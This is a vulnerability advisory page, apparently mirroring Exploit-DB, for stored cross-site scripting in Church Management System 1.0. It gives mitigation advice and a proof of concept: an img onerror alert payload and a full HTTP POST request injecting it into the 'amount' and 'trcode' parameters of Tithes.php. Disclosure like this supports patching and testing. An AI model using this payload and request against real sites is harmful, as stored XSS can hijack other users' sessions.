header-logo
Suggest Exploit
vendor:
Church Management System
by:
Murat DEMIRCI
7.5
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Church Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2021

Church Management System 1.0 – ‘Multiple’ Stored Cross-Site Scripting (XSS)

The Church Management System 1.0 is vulnerable to multiple stored cross-site scripting (XSS) attacks. An attacker can inject malicious code into the 'amount' and 'trcode' parameters, which are not properly sanitized, leading to the execution of arbitrary JavaScript code in the context of the user's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to implement input validation and sanitization on all user-supplied data. Additionally, the use of content security policies (CSP) can help mitigate the impact of XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10

# Proof of Concept :

#Payload: <img src=x onerror=alert(1)>
#Injectable parameters : amount=  and trcode=

###################### REQUEST ##########################################

POST /cman/members/Tithes.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/members/Tithes.php
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
Upgrade-Insecure-Requests: 1

amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=

Navigation

Suggest Exploit

Services By CQR